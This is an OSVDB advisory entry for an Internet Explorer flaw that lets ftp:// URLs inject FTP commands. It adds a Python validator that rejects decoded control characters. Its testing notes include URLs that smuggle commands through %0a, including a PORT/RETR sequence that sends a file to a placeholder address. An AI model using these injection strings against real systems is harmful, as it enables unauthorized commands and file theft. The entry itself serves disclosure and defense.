Microsoft IE FTP URL Arbitrary Command Injection

2004-12-06T09:07:28
ID OSVDB:12299
Type osvdb
Reporter Albert Puigsech Galicia (ripe@7a69ezine.org)
Modified 2004-12-06T09:07:28

Description

Vulnerability Description

Internet Explorer contains a flaw that will allow an attacker to inject arbitrary FTP commands. The problem is that the Internet Explorer URL FTP request is not verified properly and will allow an attacker to inject or manipulate FTP commands, resulting in a loss of integrity.

Solution Description

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

Manual Testing Notes

ftp://ftpuser:ftppass@victim/directory
ftp://ftpuser:ftppass@victim/directory%0asomecommand%0a
ftp://[victim]/%0aPORT%20a,b,c,d,e,f%0aRETR%20/file
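
The check a client needs before turning an ftp:// URL into control-channel commands, shown as an added example (not code from the advisory or from Microsoft's patch): percent-decode each component, then refuse any control character, since %0a decodes to the line feed that ends one FTP command and starts the next. The function names, the anonymous/guest@ defaults and the host ftp.example.test are assumptions made for the illustration.

```python
from urllib.parse import urlsplit, unquote


class UnsafeFtpUrl(ValueError):
    """A decoded URL component would break FTP command framing."""


def _decoded(name, raw):
    # Decode first, then validate: the dangerous bytes only exist after
    # percent-decoding (%0a -> LF, %0d -> CR).
    value = unquote(raw)
    for ch in value:
        if ord(ch) < 0x20 or ord(ch) == 0x7F:
            raise UnsafeFtpUrl(f"{name}: control character 0x{ord(ch):02x}")
    return value


def ftp_commands(url):
    """Return the control-channel lines for fetching `url`, or raise."""
    parts = urlsplit(url)
    if parts.scheme != "ftp":
        raise UnsafeFtpUrl("not an ftp:// URL")
    # Defaults for URLs without userinfo are assumptions of this example.
    user = _decoded("user", parts.username or "anonymous")
    password = _decoded("password", parts.password or "guest@")
    segments = [_decoded("path", s) for s in parts.path.split("/") if s]
    if not segments:
        raise UnsafeFtpUrl("no file name in URL path")
    *dirs, filename = segments
    lines = [f"USER {user}", f"PASS {password}"]
    lines += [f"CWD {d}" for d in dirs]
    lines.append(f"RETR {filename}")
    # Each validated argument now occupies exactly one CRLF-terminated line.
    return [line + "\r\n" for line in lines]


def is_safe(url):
    """True when every decoded component fits on a single command line."""
    try:
        ftp_commands(url)
        return True
    except UnsafeFtpUrl:
        return False
```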

References:

Security Tracker: 1012444
Secunia Advisory ID: 13404
Secunia Advisory ID: 21396
Related OSVDB ID: 27852
Related OSVDB ID: 27851
Related OSVDB ID: 27853
Related OSVDB ID: 27850
Related OSVDB ID: 27854
Related OSVDB ID: 27855
Other Advisory URL: http://www.7a69ezine.org/node/view/168
Microsoft Security Bulletin: MS06-042
Microsoft Knowledge Base Article: 918899
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-12/0076.html
Keyword: 7a69ezine Advisories 7a69Adv#15
ISS X-Force ID: 18384
FrSIRT Advisory: ADV-2006-3212
CVE-2004-1166
Bugtraq ID: 11826